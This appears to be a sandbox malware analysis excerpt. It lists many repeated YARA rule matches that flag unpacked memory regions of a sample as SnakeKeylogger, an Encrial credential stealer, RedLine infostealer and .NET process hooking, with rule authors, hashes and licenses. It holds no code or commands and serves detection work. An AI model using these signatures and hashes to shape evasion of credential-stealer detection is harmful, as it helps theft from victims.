Source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.1.nhpoymuP.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.nhpoymuP.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.image.exe.21e00948.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
